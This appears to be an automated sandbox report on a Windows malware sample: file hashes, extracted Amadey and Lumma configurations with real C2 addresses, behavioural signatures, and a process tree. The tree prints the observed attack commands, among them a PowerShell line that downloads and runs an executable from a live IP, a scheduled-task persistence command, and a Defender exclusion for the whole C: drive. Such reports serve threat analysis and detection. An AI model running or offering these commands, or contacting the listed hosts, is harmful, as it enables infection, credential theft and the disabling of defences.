Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/04/2025, 14:50

General

  • Target

    2025-04-07_669f3bec52a1cde1a51fee8bfab3b8b5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    669f3bec52a1cde1a51fee8bfab3b8b5

  • SHA1

    5e6820a2241a8a468997d8edacd5d57910a7f9a1

  • SHA256

    2d4aeb40b6324499964f7d86f718f8e4f35c874cf76eda3e2e920bd0975e6b95

  • SHA512

    894f7cf30afd8d9511ff319b0c49e55ead55e8fbe0a4f75ef2d9dbd7081653fe5aa70ebdc880e9d68084321da82ccb0579f402fed905377d9e97bab378ca9992

  • SSDEEP

    24576:0qDEvCTbMWu7rQYlBQcBiT6rprG8a0Eu:0TvC/MTQYxsWR7a0E

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://jrxsafer.top/shpaoz

https://plantainklj.run/opafg

https://puerrogfh.live/iqwez

https://quavabvc.top/iuzhd

https://nadvennture.top/GKsiio

https://targett.top/dsANGt

https://rambutanvcx.run/adioz

https://uywmedici.top/noagis

https://reboundui.live/aomgd

https://krxspint.digital/kendwz

https://rhxhube.run/pogrs

https://grxeasyw.digital/xxepw

https://advennture.top/GKsiio

https://xrfxcaseq.live/gspaz

https://ywmedici.top/noagis

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://wstarcloc.bet/GOksAo

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 15 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Sets service image path in registry 2 TTPs 6 IoCs
  • Uses browser remote debugging 2 TTPs 8 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 24 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
  • Loads dropped DLL 25 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 21 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 24 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 21 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies registry class 12 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 20 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-04-07_669f3bec52a1cde1a51fee8bfab3b8b5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-07_669f3bec52a1cde1a51fee8bfab3b8b5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2988
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn TG3gRma5YJy /tr "mshta C:\Users\Admin\AppData\Local\Temp\WU8sHcJAu.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1916
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn TG3gRma5YJy /tr "mshta C:\Users\Admin\AppData\Local\Temp\WU8sHcJAu.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2560
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\WU8sHcJAu.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5776
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'QSOPYYHQPWAOVVBAEJIONKX0KQKMIZSN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4188
        • C:\Users\Admin\AppData\Local\TempQSOPYYHQPWAOVVBAEJIONKX0KQKMIZSN.EXE
          "C:\Users\Admin\AppData\Local\TempQSOPYYHQPWAOVVBAEJIONKX0KQKMIZSN.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:5304
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:6104
            • C:\Users\Admin\AppData\Local\Temp\10494540101\31W3sid.exe
              "C:\Users\Admin\AppData\Local\Temp\10494540101\31W3sid.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:3920
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                7⤵
                  PID:4444
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                    PID:2956
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    7⤵
                    • Checks SCSI registry key(s)
                    PID:5268
                • C:\Users\Admin\AppData\Local\Temp\10494550101\DgQBvwg.exe
                  "C:\Users\Admin\AppData\Local\Temp\10494550101\DgQBvwg.exe"
                  6⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:6072
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bjal1043\bjal1043.cmdline"
                    7⤵
                    • Suspicious use of WriteProcessMemory
                    PID:5568
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1CE9.tmp" "c:\Users\Admin\AppData\Local\Temp\bjal1043\CSC5764624E65FB4729BD1C613E2AD63EF.TMP"
                      8⤵
                        PID:6036
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      7⤵
                        PID:828
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        7⤵
                        • Downloads MZ/PE file
                        • Accesses Microsoft Outlook accounts
                        • Accesses Microsoft Outlook profiles
                        • Suspicious use of SetThreadContext
                        • Drops file in Program Files directory
                        • System Location Discovery: System Language Discovery
                        • Checks processor information in registry
                        • Suspicious behavior: AddClipboardFormatListener
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SetWindowsHookEx
                        • outlook_office_path
                        • outlook_win_path
                        PID:1876
                        • C:\Windows\system32\rundll32.exe
                          "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                          8⤵
                          • Modifies registry class
                          • Suspicious use of FindShellTrayWindow
                          PID:3192
                        • C:\Windows\system32\rundll32.exe
                          "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                          8⤵
                          • Modifies registry class
                          • Suspicious use of FindShellTrayWindow
                          PID:2016
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          --restore-last-session --remote-debugging-port=9223 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
                          8⤵
                          • Uses browser remote debugging
                          • Enumerates system info in registry
                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of FindShellTrayWindow
                          PID:4728
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9adb2dcf8,0x7ff9adb2dd04,0x7ff9adb2dd10
                            9⤵
                              PID:4712
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2168,i,9335411938947663086,8109096376332112398,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2164 /prefetch:3
                              9⤵
                                PID:4936
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2124,i,9335411938947663086,8109096376332112398,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2116 /prefetch:2
                                9⤵
                                  PID:5280
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2372,i,9335411938947663086,8109096376332112398,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2376 /prefetch:8
                                  9⤵
                                    PID:4856
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3248,i,9335411938947663086,8109096376332112398,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3244 /prefetch:1
                                    9⤵
                                    • Uses browser remote debugging
                                    PID:5984
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3272,i,9335411938947663086,8109096376332112398,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3268 /prefetch:1
                                    9⤵
                                    • Uses browser remote debugging
                                    PID:1796
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4260,i,9335411938947663086,8109096376332112398,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4256 /prefetch:2
                                    9⤵
                                    • Uses browser remote debugging
                                    PID:412
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4664,i,9335411938947663086,8109096376332112398,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4532 /prefetch:1
                                    9⤵
                                    • Uses browser remote debugging
                                    PID:1120
                                • C:\Windows\system32\rundll32.exe
                                  "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                  8⤵
                                  • Modifies registry class
                                  • Suspicious use of FindShellTrayWindow
                                  PID:5648
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  --restore-last-session --remote-debugging-port=9225 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default"
                                  8⤵
                                  • Uses browser remote debugging
                                  • Enumerates system info in registry
                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                  • Suspicious use of FindShellTrayWindow
                                  PID:552
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x2a8,0x7ff9b036f208,0x7ff9b036f214,0x7ff9b036f220
                                    9⤵
                                      PID:2080
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2236,i,5083179104300912456,12538199034923471502,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2224 /prefetch:2
                                      9⤵
                                        PID:3620
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2416,i,5083179104300912456,12538199034923471502,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2412 /prefetch:3
                                        9⤵
                                          PID:1952
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2380,i,5083179104300912456,12538199034923471502,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2624 /prefetch:8
                                          9⤵
                                            PID:1564
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3604,i,5083179104300912456,12538199034923471502,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3600 /prefetch:1
                                            9⤵
                                            • Uses browser remote debugging
                                            PID:1396
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3664,i,5083179104300912456,12538199034923471502,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3660 /prefetch:1
                                            9⤵
                                            • Uses browser remote debugging
                                            PID:2820
                                        • C:\Windows\system32\rundll32.exe
                                          "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                          8⤵
                                          • Modifies registry class
                                          • Suspicious use of FindShellTrayWindow
                                          PID:1148
                                        • C:\Windows\system32\rundll32.exe
                                          "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                          8⤵
                                          • Modifies registry class
                                          • Suspicious use of FindShellTrayWindow
                                          PID:6012
                                        • C:\Windows\system32\rundll32.exe
                                          "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                          8⤵
                                          • Modifies registry class
                                          • Suspicious use of FindShellTrayWindow
                                          PID:2488
                                        • C:\Windows\system32\rundll32.exe
                                          "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                          8⤵
                                          • Modifies registry class
                                          • Suspicious use of FindShellTrayWindow
                                          PID:3816
                                        • C:\Windows\system32\rundll32.exe
                                          "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                          8⤵
                                          • Modifies registry class
                                          • Suspicious use of FindShellTrayWindow
                                          PID:14056
                                        • C:\Windows\system32\rundll32.exe
                                          "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                          8⤵
                                          • Modifies registry class
                                          • Suspicious use of FindShellTrayWindow
                                          PID:6476
                                        • C:\Windows\system32\rundll32.exe
                                          "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                          8⤵
                                          • Modifies registry class
                                          • Suspicious use of FindShellTrayWindow
                                          PID:6640
                                        • C:\Windows\system32\rundll32.exe
                                          "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                          8⤵
                                          • Modifies registry class
                                          • Suspicious use of FindShellTrayWindow
                                          PID:9732
                                        • C:\Windows\system32\rundll32.exe
                                          "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                          8⤵
                                          • Modifies registry class
                                          • Suspicious use of FindShellTrayWindow
                                          PID:7456
                                        • C:\Windows\system32\rundll32.exe
                                          "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                          8⤵
                                          • Suspicious use of FindShellTrayWindow
                                          PID:868
                                    • C:\Users\Admin\AppData\Local\Temp\10494560101\larBxd7.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10494560101\larBxd7.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:4536
                                    • C:\Users\Admin\AppData\Local\Temp\10494570101\9sWdA2p.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10494570101\9sWdA2p.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:3496
                                    • C:\Users\Admin\AppData\Local\Temp\10494580101\Rm3cVPI.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10494580101\Rm3cVPI.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      PID:5004
                                    • C:\Users\Admin\AppData\Local\Temp\10494590101\v1BRaoR.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10494590101\v1BRaoR.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:5384
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                        7⤵
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1916
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 1160
                                          8⤵
                                          • Program crash
                                          PID:5584
                                    • C:\Users\Admin\AppData\Local\Temp\10494610101\ibC8xs1.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10494610101\ibC8xs1.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      • Suspicious use of SetThreadContext
                                      PID:2988
                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\knwfzdsw\knwfzdsw.cmdline"
                                        7⤵
                                          PID:5736
                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD107.tmp" "c:\Users\Admin\AppData\Local\Temp\knwfzdsw\CSCB425D5EECDAA4CBCA6CD873CFE85A9E.TMP"
                                            8⤵
                                              PID:3416
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                            7⤵
                                              PID:5204
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                              7⤵
                                                PID:1892
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                7⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1948
                                            • C:\Users\Admin\AppData\Local\Temp\10494620101\UZPt0hR.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10494620101\UZPt0hR.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: MapViewOfSection
                                              PID:5660
                                              • C:\Windows\SYSTEM32\cmd.exe
                                                cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                7⤵
                                                  PID:640
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                    8⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    PID:3872
                                                • C:\Windows\system32\svchost.exe
                                                  "C:\Windows\system32\svchost.exe"
                                                  7⤵
                                                  • Downloads MZ/PE file
                                                  • Adds Run key to start application
                                                  PID:936
                                                  • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
